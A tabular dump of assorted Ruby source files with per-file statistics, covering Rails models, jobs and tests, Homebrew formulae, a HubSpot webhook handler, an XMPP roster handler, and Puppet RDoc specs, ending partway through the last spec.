hexsha (string) | size (int64) | content (string) | avg_line_length (float64) | max_line_length (int64) | alphanum_fraction (float64)
---|---|---|---|---|---
01c4893bc27d83db9a501c6370844ad63958e6b0 | 4,305 |
# Copyright © 2011-2020 MUSC Foundation for Research Development~
# All rights reserved.~
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:~
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.~
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following~
# disclaimer in the documentation and/or other materials provided with the distribution.~
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products~
# derived from this software without specific prior written permission.~
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,~
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT~
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL~
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS~
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR~
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.~
class Appointment < ApplicationRecord
VISIT_TYPES = ['Lab Only', 'Space Only', 'PFT Only'].freeze
STATUSES = ['Skipped Visit', 'Visit happened elsewhere', 'Patient missed visit', 'No show', 'Visit happened outside of window'].freeze
NOTABLE_REASONS = ['Assessment not performed', 'SAE/Follow-up for SAE', 'Patient Visit Conflict', 'Study Visit Assessments Inconclusive', 'Other'].freeze
default_scope {order(:position)}
has_paper_trail
acts_as_paranoid
acts_as_list scope: [:arm_id, :protocols_participant_id]
include CustomPositioning #custom methods around positioning, acts_as_list
belongs_to :arm, -> { with_deleted }
belongs_to :protocols_participant
belongs_to :visit_group
has_one :protocol, through: :arm
has_many :appointment_statuses, dependent: :destroy
has_many :procedures, dependent: :destroy
has_many :notes, as: :notable
scope :completed, -> { where('completed_date IS NOT NULL') }
scope :incompleted, -> { where('appointments.completed_date IS NULL') }
scope :unstarted, -> { where('appointments.start_date IS NULL AND appointments.completed_date IS NULL') }
scope :with_completed_procedures, -> { joins(:procedures).where("procedures.completed_date IS NOT NULL") }
validates :name, presence: true
validates :arm_id, presence: true
validates :protocols_participant_id, presence: true
accepts_nested_attributes_for :notes
def cores
Organization.where(id: self.procedures.pluck(:sparc_core_id))
end
# Can appointment be finished? It must have a start date, and
# all of its procedures must either be complete, incomplete, or
# have a follow-up date assigned to them (i.e. none may still be unstarted).
def started?
start_date.present?
end
def completed?
self.completed_date.present?
end
def can_finish?
!start_date.blank? && (procedures.all? { |proc| !proc.unstarted? })
end
def has_completed_procedures?
procedures.any?(&:completed_date)
end
def has_invoiced_procedures?
procedures.any?(&:invoiced?)
end
def has_credited_procedures?
procedures.any?(&:credited?)
end
def performable_by
# List of clinical providers that can perform actions on the appointment's procedures
self.protocol.organization.clinical_provider_identities.order(:first_name, :last_name)
end
def procedures_grouped_by_core
procedures.group_by(&:sparc_core_id)
end
def set_completed_date
self.completed_date = Time.now
end
def destroy
if can_be_destroyed?
super
else
raise ActiveRecord::ActiveRecordError
end
end
def can_be_destroyed?
procedures.touched.empty?
end
def formatted_name
self.type == 'CustomAppointment' ? "#{self.name} (Custom Visit)" : self.visit_group.identifier
end
end
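# A minimal sketch of the can_finish? rule above, using plain Ruby structs in
# place of ActiveRecord objects; it assumes Procedure#unstarted? simply reports
# whether work on the procedure has begun.
#
#   Procedure = Struct.new(:unstarted) do
#     def unstarted?; unstarted; end
#   end
#   appointment = Struct.new(:start_date, :procedures).new(Time.now, [Procedure.new(false)])
#   !appointment.start_date.nil? && appointment.procedures.none?(&:unstarted?) # => true, so it can finish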
| 37.112069 | 155 | 0.757724 |
1c7a94fbb5358fbd7d29359da9a0d5492cee6809 | 260 |
# frozen_string_literal: true
class RunConsistencyChecksJob < ApplicationJob
queue_as :default
def perform(*_args)
ConsistencyCheck.all.each do |consistency_check|
Dttp::CheckConsistencyJob.perform_later(consistency_check.id)
end
end
end
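# Usage sketch, assuming stock ActiveJob: the job can be enqueued from a
# console or a scheduler, and it then fans out one Dttp::CheckConsistencyJob
# per ConsistencyCheck record.
#
#   RunConsistencyChecksJob.perform_later   # enqueue asynchronously
#   RunConsistencyChecksJob.perform_now     # or run inline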
| 21.666667 | 67 | 0.780769 |
bb4de7dd548a96c5d795e8e4a07aa32221790888 | 962 |
# Submitting Private Code
# 1. run for simulator
# 2. run for device
# 3. archive project
# 4. upload libMonyx.framework to github
# 5. create new release with version like in .podspec (for example 2.0.0)
# 6. run: pod repo push https://github.com/paveljo/Specs.git libMonyx.podspec
Pod::Spec.new do |s|
s.name = 'libMonyx'
s.version = '2.3.0'
s.summary = 'Monyx library'
s.homepage = 'https://github.com/paveljo/libMonyx'
s.author = { 'Name' => '[email protected]' }
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.platforms = { :ios => '10.0'}
s.source = { :git => 'https://github.com/paveljo/libMonyx.git', :tag => s.version.to_s}
s.pod_target_xcconfig = { 'EXCLUDED_ARCHS[sdk=iphonesimulator*]' => 'arm64' }
s.user_target_xcconfig = { 'EXCLUDED_ARCHS[sdk=iphonesimulator*]' => 'arm64' }
s.swift_version = '5.0'
s.ios.deployment_target = '10.0'
s.ios.vendored_frameworks = 'libMonyx.framework'
end
| 35.62963 | 91 | 0.650728 |
ab6feb53fb6a85071d40566e362d40220af697d1 | 428 |
require 'test_helper'
class Cms::Fortress::SettingsTest < ActiveSupport::TestCase
test "it_should_raise_MissingConfigFile_exception" do
assert_raises (Cms::Fortress::Error::MissingSettingsFile) {
Cms::Fortress::Settings.new(:bla)
}
end
test "test_it_should_return_the_config_file" do
settings = Cms::Fortress::Settings.new(:global_settings)
assert_equal(settings.title, 'CMS Fortress')
end
end
| 25.176471 | 63 | 0.752336 |
bb77f986329f512722d02e7d3aaa1291a28b6518 | 804 |
#
# Cookbook Name:: attribute_settings
# Recipe:: default
#
# Copyright 2009, Opscode
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Chef::Recipe
include SyncLibrary
end
# Run the library code
go
$sync_library_global ||= 2
$sync_library_global -= 1
exit(2) if $sync_library_global == 0
| 25.935484 | 74 | 0.747512 |
eddd0b2fca6ec51ab8bdfd280df67a2d7c5ba8ca | 67 |
require "maor/version"
module Maor
# Your code goes here...
end
| 11.166667 | 26 | 0.701493 |
e2c8eede18dfbbbb06c6fac59917bca18c408544 | 132 |
require 'test_helper'
class EmailCertificationTest < ActiveSupport::TestCase
# test "the truth" do
# assert true
# end
end
| 16.5 | 54 | 0.727273 |
edc2e8c7b1d030ff5ceed26794fde268856c3088 | 264 |
# frozen_string_literal: true
module GithubEventsExport
# Save each Event to disk
class Export
def initialize(client)
@client = client
end
def run
Event.all(client).each(&:save)
end
private
attr_reader :client
end
end
| 13.894737 | 36 | 0.659091 |
edecece72a18c283a45c95d1400eef5d5f254291 | 191 |
require 'link_previewer/version'
require 'link_previewer/parser'
require 'link_previewer/previewer'
module LinkPreviewer
def self.init(url)
LinkPreviewer::Previewer.new(url)
end
end
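# Usage sketch (the URL is a placeholder): LinkPreviewer.init is a thin
# wrapper around Previewer.new, so a preview object is obtained with:
#
#   preview = LinkPreviewer.init("https://example.com")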
| 19.1 | 37 | 0.795812 |
79334b1622453cf2ad2de16e1313ad65a9c7064e | 899 |
module Services
module Hubspot
class HandleWebhook
def initialize(webhook:)
@webhook = webhook
end
def call
case @webhook['subscriptionType']
when 'contact.propertyChange'
return false unless webhook_valid?
handle_webhook
else
false
end
end
private
def webhook_valid?
if @webhook['propertyName'] != ENV['PROTECTED_FILE_LINK_PROPERTY'] ||
@webhook['propertyValue'].empty?
return false
end
true
end
def handle_webhook
file_url = Services::Hubspot::GetUploadedFileByUrl.new(url: @webhook['propertyValue']).call
contact = ::Hubspot::Contact.new('vid' => @webhook['objectId'], 'properties' => { sample: 'sample' })
contact.update!(ENV['PUBLIC_FILE_LINK_PROPERTY'] => file_url)
end
end
end
end
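# Usage sketch with a made-up payload; the keys mirror the ones read above and
# the property names come from the same environment variables.
#
#   payload = {
#     'subscriptionType' => 'contact.propertyChange',
#     'objectId'         => 1234,
#     'propertyName'     => ENV['PROTECTED_FILE_LINK_PROPERTY'],
#     'propertyValue'    => 'https://example.com/uploaded-file.pdf'
#   }
#   Services::Hubspot::HandleWebhook.new(webhook: payload).call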
| 23.657895 | 109 | 0.596218 |
b90ff225b20217143824cb6673a9de32e72594b7 | 168 |
require 'test_helper'
class StaticPagesControllerTest < ActionController::TestCase
test "should get index" do
get :index
assert_response :success
end
end
| 16.8 | 60 | 0.761905 |
e9c9a494f9f88f1695696f8ec5b344caf8b686d1 | 137 |
class RemoveFechaInicioFromProyectos < ActiveRecord::Migration
def change
remove_column :proyectos, :fecha_inicio, :date
end
end
| 22.833333 | 62 | 0.79562 |
ff25e99955c877396f9767b18fe37b0e5736aa35 | 717 |
require 'spec_helper'
require 'net/http'
describe Lab2::LiveStreamConnection do
it "requests an access token, connects to the live stream endpoint, and streams messages to stdout" do
credentials = Lab::Credentials.new
token_request = Lab2::TokenRequest.new(credentials.client_id, credentials.client_secret)
response = token_request.request
expect(response).to_not be_nil
expect(response).to be_a(Net::HTTPSuccess)
access_token = token_request.parse_response(response.body)
expect(access_token).to_not be_nil
expect(access_token).to be_a(String)
connection = Lab2::LiveStreamConnection.new(credentials.livestream_endpoint_url, access_token)
connection.open
end
end
| 27.576923 | 104 | 0.772664 |
7aef6e808c34448109d33fea7e5dcd69c9b1f18c | 2,234 |
class Virtuoso < Formula
desc "High-performance object-relational SQL database"
homepage "https://virtuoso.openlinksw.com/wiki/main/"
url "https://github.com/openlink/virtuoso-opensource/releases/download/v7.2.6.1/virtuoso-opensource-7.2.6.tar.gz"
sha256 "38fd3c037aef62fcc7c28de5c0d6c2577d4bb19809e71421fc42093ed4d1c753"
license "GPL-2.0-only"
bottle do
sha256 cellar: :any, arm64_monterey: "80cff43493d2981f14ec84848d5951a239a1ffe307bc030e7fed2ebc48234303"
sha256 cellar: :any, arm64_big_sur: "07dd74a255eadcb7bf6cc41d3e07445a992069e5ab9072dc24a8f02fd98dcf74"
sha256 cellar: :any, monterey: "dfd970140bb4e7a212d2fa8c4be8a45a75d643fa247ed185d1fc6607ff044e76"
sha256 cellar: :any, big_sur: "d35c507e655a9b900986b609bb232f30c811cbfb4f3ec20d60d1146059ba5305"
sha256 cellar: :any, catalina: "bb672169382bf5faa77845765420adc91f5af1e46239e1f9d45d187b2f335570"
sha256 cellar: :any, mojave: "e19a2320912ff23b8f0a4926ee3c830d1bbbc9388fbe21634cbecf919e17f708"
sha256 cellar: :any_skip_relocation, x86_64_linux: "d396498868d1529455ff98c3432df539f5c0acecc2f807c7d5f49e1cf10d3267"
end
head do
url "https://github.com/openlink/virtuoso-opensource.git", branch: "develop/7"
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
end
# If gawk isn't found, make fails deep into the process.
depends_on "gawk" => :build
depends_on "[email protected]"
uses_from_macos "bison" => :build
uses_from_macos "flex" => :build
uses_from_macos "gperf" => :build
on_linux do
depends_on "net-tools" => :build
end
conflicts_with "unixodbc", because: "both install `isql` binaries"
skip_clean :la
def install
system "./autogen.sh" if build.head?
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}"
system "make", "install"
end
def caveats
<<~EOS
NOTE: the Virtuoso server will start up several times on port 1111
during the install process.
EOS
end
test do
system bin/"virtuoso-t", "+checkpoint-only"
end
end
| 37.233333 | 123 | 0.703223 |
87ad5deeb71c8b9f6e8b182adbd0f241543dd392 | 179 |
require 'gettext_i18n_rails'
require 'gettext_i18n_rails_js/engine'
require 'gettext_i18n_rails_js/js_and_coffee_parser' if RUBY_PLATFORM != 'java'
module GettextI18nRailsJs
end
| 25.571429 | 79 | 0.854749 |
3925ec72547ef6f208fcd4e7dcdc576a71b6efac | 2,172 |
require 'test_helper'
class PasswordResetsTest < ActionDispatch::IntegrationTest
def setup
ActionMailer::Base.deliveries.clear
@user = users(:michael)
end
test "password resets" do
get new_password_reset_path
assert_template 'password_resets/new'
# アドレス無効
post password_resets_path, params: { password_reset: {email: "" }}
assert_not flash.empty?
assert_template 'password_resets/new'
# アドレス有効
post password_resets_path,
params: { password_reset: { email: @user.email }}
assert_equal 1, ActionMailer::Base.deliveries.size
assert_not flash.empty?
assert_redirected_to root_url
# 再設定フォームのテスト
user = assigns(:user)
# アドレス無効
get edit_password_reset_path(user.reset_token, email: "")
assert_redirected_to root_url
# 無効なユーザー
user.toggle!(:activated)
get edit_password_reset_path(user.reset_token, email: user.email)
assert_redirected_to root_url
user.toggle!(:activated)
# アドレス有効、トークン無効
get edit_password_reset_path("wrong token", email: user.email)
assert_redirected_to root_url
# アドレスもトークンも有効
get edit_password_reset_path(user.reset_token, email: user.email)
assert_template 'password_resets/edit'
assert_select "input[name=email][type=hidden][value=?]", user.email
# 無効パスワードとパスワード確認
patch password_reset_path(user.reset_token),
params: { email: user.email,
user: { password: "foobaz",
password_confirmation: "barquux"}}
assert_select 'div#error_explanation'
# パスワードが空
patch password_reset_path(user.reset_token),
params: { email: user.email,
user: { password: "",
password_confirmation: ""}}
assert_select 'div#error_explanation'
# 有効なパスワードとパスワード確認
patch password_reset_path(user.reset_token),
params: { email: user.email,
user: { password: "foobaz",
password_confirmation: "foobaz"}}
assert is_logged_in?
assert_not flash.empty?
assert_redirected_to user
end
end
| 35.032258 | 72 | 0.655157 |
26ef4605fff31b9c7fe8d0c12dc0d1835663c86d | 8,275 |
require 'spec_helper'
describe EmailValidator do
person_class = Class.new do
include ActiveModel::Validations
attr_accessor :email
validates :email, :email => true
end
person_class_mx = Class.new do
include ActiveModel::Validations
attr_accessor :email
validates :email, :email => {:mx => true}
end
person_class_mx_with_fallback = Class.new do
include ActiveModel::Validations
attr_accessor :email
validates :email, :email => {:mx_with_fallback => true}
end
person_class_disposable_email = Class.new do
include ActiveModel::Validations
attr_accessor :email
validates :email, :email => {:ban_disposable_email => true}
end
person_class_nil_allowed = Class.new do
include ActiveModel::Validations
attr_accessor :email
validates :email, :email => {:allow_nil => true}
end
person_class_blank_allowed = Class.new do
include ActiveModel::Validations
attr_accessor :email
validates :email, :email => {:allow_blank => true}
end
person_class_mx_separated = Class.new do
include ActiveModel::Validations
attr_accessor :email
validates :email, :mx => true
end
person_class_mx_with_fallback_separated = Class.new do
include ActiveModel::Validations
attr_accessor :email
validates :email, :mx_with_fallback => true
end
person_class_domain = Class.new do
include ActiveModel::Validations
attr_accessor :email
validates :email, :domain => true
end
person_message_specified = Class.new do
include ActiveModel::Validations
attr_accessor :email
validates :email, :email => { :message => 'custom message', :ban_disposable_email => true }
end
shared_examples_for "Invalid model" do
before { subject.valid? }
it { is_expected.not_to be_valid }
specify { expect(subject.errors[:email]).to match_array errors }
end
shared_examples_for "Validating emails" do
before :each do
I18n.locale = locale
end
describe "validating email" do
subject { person_class.new }
it "fails when email empty" do
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
it "fails when email is not valid" do
subject.email = 'joh@doe'
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
it "fails when email domain is prefixed with dot" do
subject.email = '[email protected]'
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
it "fails when email domain contains two consecutive dots" do
subject.email = '[email protected]'
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
it "fails when email is valid with information" do
subject.email = '"John Doe" <[email protected]>'
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
it "passes when email is simple email address" do
subject.email = '[email protected]'
expect(subject.valid?).to be_truthy
expect(subject.errors[:email]).to be_empty
end
it "fails when email is simple email address not stripped" do
subject.email = '[email protected] '
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
it "fails when domain contains a space" do
subject.email = 'john@doe .com'
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
it "fails when passing multiple simple email addresses" do
subject.email = '[email protected], [email protected]'
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
end
describe "validating email with MX and fallback to A" do
subject { person_class_mx_with_fallback.new }
it "passes when email domain has MX record" do
subject.email = '[email protected]'
expect(subject.valid?).to be_truthy
expect(subject.errors[:email]).to be_empty
end
it "passes when email domain has no MX record but has an A record" do
subject.email = '[email protected]'
expect(subject.valid?).to be_truthy
expect(subject.errors[:email]).to be_empty
end
it "fails when domain does not exists" do
subject.email = '[email protected]'
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
end
describe "validating email with MX" do
subject { person_class_mx.new }
it "passes when email domain has MX record" do
subject.email = '[email protected]'
expect(subject.valid?).to be_truthy
expect(subject.errors[:email]).to be_empty
end
it "fails when email domain has no MX record" do
subject.email = '[email protected]'
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
it "fails when domain does not exists" do
subject.email = '[email protected]'
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
end
describe "validating MX with fallback to A" do
subject { person_class_mx_with_fallback_separated.new }
context "when domain is not specified" do
before { subject.email = 'john' }
it_behaves_like "Invalid model"
end
context "when domain is not specified but @ is" do
before { subject.email = 'john@' }
it_behaves_like "Invalid model"
end
end
describe "validating MX" do
subject { person_class_mx_separated.new }
context "when domain is not specified" do
before { subject.email = 'john' }
it_behaves_like "Invalid model"
end
context "when domain is not specified but @ is" do
before { subject.email = 'john@' }
it_behaves_like "Invalid model"
end
end
describe "validating email from disposable service" do
subject { person_class_disposable_email.new }
it "passes when email from trusted email services" do
subject.email = '[email protected]'
expect(subject.valid?).to be_truthy
expect(subject.errors[:email]).to be_empty
end
it "fails when email from disposable email services" do
subject.email = '[email protected]'
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
end
describe "validating domain" do
subject { person_class_domain.new }
it "does not pass with an invalid domain" do
subject.email = "[email protected]$\'"
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
it "passes with valid domain" do
subject.email = '[email protected]'
expect(subject.valid?).to be_truthy
expect(subject.errors[:email]).to be_empty
end
end
end
describe "Can allow nil" do
subject { person_class_nil_allowed.new }
it "passes even if mail isn't set" do
subject.email = nil
expect(subject).to be_valid
expect(subject.errors[:email]).to be_empty
end
end
describe "Can allow blank" do
subject { person_class_blank_allowed.new }
it "passes even if mail is a blank string set" do
subject.email = ''
expect(subject).to be_valid
expect(subject.errors[:email]).to be_empty
end
end
describe "Accepts custom messages" do
subject { person_message_specified.new }
it "adds only the custom error" do
subject.email = '[email protected]'
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to match_array [ 'custom message' ]
end
end
describe "Translating in english" do
let!(:locale){ :en }
let!(:errors) { [ "is invalid" ] }
it_behaves_like "Validating emails"
end
describe "Translating in french" do
let!(:locale){ :fr }
let!(:errors) { [ "est invalide" ] }
it_behaves_like "Validating emails"
end
end
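# The option combinations exercised by these specs map directly onto model
# code; a hypothetical ActiveRecord model using the same validator options
# would look like:
#
#   class Subscriber < ApplicationRecord
#     validates :email, email: { mx: true, ban_disposable_email: true, allow_blank: true }
#   end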
| 29.343972 | 95 | 0.658489 |
21eae66299199933c1a8afa25973b558b005f2a4 | 5,160 |
# encoding: UTF-8
module Vines
class Stanza
class Iq
class Roster < Query
NS = NAMESPACES[:roster]
register "/iq[@id and (@type='get' or @type='set')]/ns:query", 'ns' => NS
def process
validate_to_address
get? ? roster_query : update_roster
end
private
# Send an iq result stanza containing roster items to the user in
# response to their roster get request. Requesting the roster makes
# this stream an "interested resource" that can now receive roster
# updates.
def roster_query
stream.requested_roster!
stream.write(stream.user.to_roster_xml(self['id']))
end
# Roster sets must have no 'to' address or be addressed to the same
# JID that sent the stanza. RFC 6121 sections 2.1.5 and 2.3.3.
def validate_to_address
to = validate_to
unless to.nil? || to.bare == stream.user.jid.bare
raise StanzaErrors::Forbidden.new(self, 'auth')
end
end
# Add, update, or delete the roster item contained in the iq set
# stanza received from the client. RFC 6121 sections 2.3, 2.4, 2.5.
def update_roster
items = self.xpath('ns:query/ns:item', 'ns' => NS)
raise StanzaErrors::BadRequest.new(self, 'modify') if items.size != 1
item = items.first
jid = JID.new(item['jid']) rescue (raise StanzaErrors::JidMalformed.new(self, 'modify'))
raise StanzaErrors::BadRequest.new(self, 'modify') if jid.empty? || !jid.bare?
if item['subscription'] == 'remove'
remove_contact(jid)
return
end
raise StanzaErrors::NotAllowed.new(self, 'modify') if jid == stream.user.jid.bare
groups = item.xpath('ns:group', 'ns' => NS).map {|g| g.text.strip }
raise StanzaErrors::BadRequest.new(self, 'modify') if groups.uniq!
raise StanzaErrors::NotAcceptable.new(self, 'modify') if groups.include?('')
contact = stream.user.contact(jid)
unless contact
contact = Contact.new(jid: jid)
stream.user.roster << contact
end
contact.name = item['name']
contact.groups = groups
storage.save_user(stream.user)
stream.update_user_streams(stream.user)
send_result_iq
push_roster_updates(stream.user.jid, contact)
end
# Remove the contact with this JID from the user's roster and send
# roster pushes to the user's interested resources. This is triggered
# by receiving an iq set with an item element like
# <item jid="[email protected]" subscription="remove"/>. RFC 6121
# section 2.5.
def remove_contact(jid)
contact = stream.user.contact(jid)
raise StanzaErrors::ItemNotFound.new(self, 'modify') unless contact
if local_jid?(contact.jid)
user = storage(contact.jid.domain).find_user(contact.jid)
end
if user && user.contact(stream.user.jid)
user.contact(stream.user.jid).subscription = 'none'
user.contact(stream.user.jid).ask = nil
end
stream.user.remove_contact(contact.jid)
[user, stream.user].compact.each do |save|
storage(save.jid.domain).save_user(save)
stream.update_user_streams(save)
end
send_result_iq
push_roster_updates(stream.user.jid,
Contact.new(jid: contact.jid, subscription: 'remove'))
if local_jid?(contact.jid)
send_unavailable(stream.user.jid, contact.jid) if contact.subscribed_from?
send_unsubscribe(contact)
if user && user.contact(stream.user.jid)
push_roster_updates(contact.jid, user.contact(stream.user.jid))
end
else
send_unsubscribe(contact)
end
end
# Notify the contact that it's been removed from the user's roster
# and no longer has any presence relationship with the user.
def send_unsubscribe(contact)
presence = [%w[to unsubscribe], %w[from unsubscribed]].map do |meth, type|
presence(contact.jid, type) if contact.send("subscribed_#{meth}?")
end.compact
broadcast_to_interested_resources(presence, contact.jid)
end
def presence(to, type)
doc = Document.new
doc.create_element('presence',
'from' => stream.user.jid.bare.to_s,
'id' => Kit.uuid,
'to' => to.to_s,
'type' => type)
end
# Send an iq set stanza to the user's interested resources, letting them
# know their roster has been updated.
def push_roster_updates(to, contact)
stream.interested_resources(to).each do |recipient|
contact.send_roster_push(recipient)
end
end
def send_result_iq
node = to_result
node.remove_attribute('from')
stream.write(node)
end
end
end
end
end
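# For reference, the kind of roster set handled by update_roster above has this
# shape (the JID and group are placeholder values; see RFC 6121 section 2.3):
#
#   <iq type='set' id='roster1'>
#     <query xmlns='jabber:iq:roster'>
#       <item jid='[email protected]' name='Juliet'>
#         <group>Friends</group>
#       </item>
#     </query>
#   </iq>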
| 36.595745 | 98 | 0.597287 |
b92f743dccc3a1ecbff442db39ee96d3861cd810 | 146 |
require "test_helper"
class CalendlyrTest < Minitest::Test
def test_that_it_has_a_version_number
refute_nil ::Calendlyr::VERSION
end
end
| 18.25 | 39 | 0.794521 |
619ad4cff55cef2d2145b74acce816d42b015d2d | 2,243 |
require 'spec_helper'
require 'support/test_model'
describe ActiveRecordExtensions::CreateExtensions do
describe '.update_or_create' do
context 'when no records exists previously' do
subject do
TestModel.update_or_create({day: Date.today}, {foo: :bar})
end
it { should be_an_instance_of TestModel }
it 'should have one record of type TestModel' do
expect(subject.class.count).to eq 1
end
it 'should update the value of foo' do
expect(subject.class.find_by_day(Date.today).foo).to eq "bar"
end
end
context 'when a record already exists' do
before do
TestModel.update_or_create({day: Date.today}, {foo: :bar})
end
subject do
TestModel.update_or_create({day: Date.today}, {foo: :newbar})
end
it { should be_an_instance_of TestModel }
it 'should have one record of type TestModel' do
expect(subject.class.count).to eq 1
end
it 'should update the value of foo to the new value' do
expect(subject.class.find_by_day(Date.today).foo).to eq "newbar"
end
end
end
describe '.delete_then_create' do
context 'when previous records exists' do
let(:matched_attributes) { { day: Date.today } }
let(:updated_record_foo) { 'baz' }
before do
TestModel.update_or_create(matched_attributes, {foo: 'bar'})
TestModel.update_or_create(matched_attributes, {foo: updated_record_foo})
end
it 'should have not added new records' do
expect(TestModel.count).to eq 1
end
it 'should have updated the record' do
expect(TestModel.first.foo).to eq updated_record_foo
end
end
context 'when previous records does not exists' do
let(:day) { Date.today }
let(:foo) { 'bar' }
before do
TestModel.update_or_create({ day: day }, {foo: foo})
end
it 'should have added one new record' do
expect(TestModel.count).to eq 1
end
it 'should have set the day of record' do
expect(TestModel.first.day).to eq day
end
it 'should have set the foo of record' do
expect(TestModel.first.foo).to eq foo
end
end
end
end
| 26.388235 | 81 | 0.641106 |
e86319c8c6a7e7559e8a486439fb8231e9611f72 | 1,299 |
class OpenBabel < Formula
desc "Chemical toolbox"
homepage "https://openbabel.org"
url "https://github.com/openbabel/openbabel/archive/openbabel-3-1-1.tar.gz"
version "3.1.1"
sha256 "c97023ac6300d26176c97d4ef39957f06e68848d64f1a04b0b284ccff2744f02"
license "GPL-2.0"
revision 1
head "https://github.com/openbabel/openbabel.git"
bottle do
sha256 "770cdafc4dfdd0c216ca9308d5b5ae6b9b00be8d30b387dd2e86cbff82db5acd" => :catalina
sha256 "6c44b3e574a786396b8099192e5154f1d751ee413ec265c99f8046fc5167876a" => :mojave
sha256 "49d5dc2fc8c9a857bf08e6e6711fbaf48d8a0165c328cc400e904aa5a37080a4" => :high_sierra
sha256 "c460add629080d7c4122a84d525ba9f75e6afe4c215ee160fc0840038c190dd7" => :x86_64_linux
end
depends_on "cmake" => :build
depends_on "pkg-config" => :build
depends_on "rapidjson" => :build
depends_on "swig" => :build
depends_on "cairo"
depends_on "eigen"
depends_on "[email protected]"
def install
args = std_cmake_args + %W[
-DRUN_SWIG=ON
-DPYTHON_BINDINGS=ON
-DPYTHON_EXECUTABLE=#{Formula["[email protected]"].opt_bin}/python3
]
mkdir "build" do
system "cmake", "..", *args
system "make"
system "make", "install"
end
end
test do
system "#{bin}/obabel", "-:'C1=CC=CC=C1Br'", "-omol"
end
end
| 29.522727 | 94 | 0.718245 |
e224766ac9b73ceb5aa94316b84e06263c742fb3 | 5,431 |
#! /usr/bin/env ruby -S rspec
require 'spec_helper'
require 'puppet/util/rdoc'
require 'rdoc/rdoc'
describe Puppet::Util::RDoc do
it "should fail with a clear error without RDoc 1.*" do
Puppet.features.stubs(:rdoc1?).returns(false)
expect { Puppet::Util::RDoc.rdoc("output", []) }.
should raise_error(/the version of RDoc .* is not supported/)
end
describe "when generating RDoc HTML documentation", :if => Puppet.features.rdoc1? do
before :each do
@rdoc = stub_everything 'rdoc'
RDoc::RDoc.stubs(:new).returns(@rdoc)
end
it "should tell the parser to ignore import" do
Puppet.expects(:[]=).with(:ignoreimport, true)
Puppet::Util::RDoc.rdoc("output", [])
end
it "should install the Puppet HTML Generator into RDoc generators" do
Puppet::Util::RDoc.rdoc("output", [])
RDoc::RDoc::GENERATORS["puppet"].file_name.should == "puppet/util/rdoc/generators/puppet_generator.rb"
end
it "should tell RDoc to generate documentation using the Puppet generator" do
@rdoc.expects(:document).with { |args| args.include?("--fmt") and args.include?("puppet") }
Puppet::Util::RDoc.rdoc("output", [])
end
it "should tell RDoc to be quiet" do
@rdoc.expects(:document).with { |args| args.include?("--quiet") }
Puppet::Util::RDoc.rdoc("output", [])
end
it "should pass charset to RDoc" do
@rdoc.expects(:document).with { |args| args.include?("--charset") and args.include?("utf-8") }
Puppet::Util::RDoc.rdoc("output", [], "utf-8")
end
it "should tell RDoc to force updates of indices when RDoc supports it" do
Options::OptionList.stubs(:options).returns([["--force-update", "-U", 0 ]])
@rdoc.expects(:document).with { |args| args.include?("--force-update") }
Puppet::Util::RDoc.rdoc("output", [])
end
it "should not tell RDoc to force updates of indices when RDoc doesn't support it" do
Options::OptionList.stubs(:options).returns([])
@rdoc.expects(:document).never.with { |args| args.include?("--force-update") }
Puppet::Util::RDoc.rdoc("output", [])
end
it "should tell RDoc to use the given outputdir" do
@rdoc.expects(:document).with { |args| args.include?("--op") and args.include?("myoutputdir") }
Puppet::Util::RDoc.rdoc("myoutputdir", [])
end
it "should tell RDoc to exclude .pp files under any modules/<mod>/files section" do
@rdoc.expects(:document).with { |args| args.include?("--exclude") and args.include?("/modules/[^/]*/files/.*\.pp$") }
Puppet::Util::RDoc.rdoc("myoutputdir", [])
end
it "should give all the source directories to RDoc" do
@rdoc.expects(:document).with { |args| args.include?("sourcedir") }
Puppet::Util::RDoc.rdoc("output", ["sourcedir"])
end
end
describe "when running a manifest documentation" do
it "should tell the parser to ignore import" do
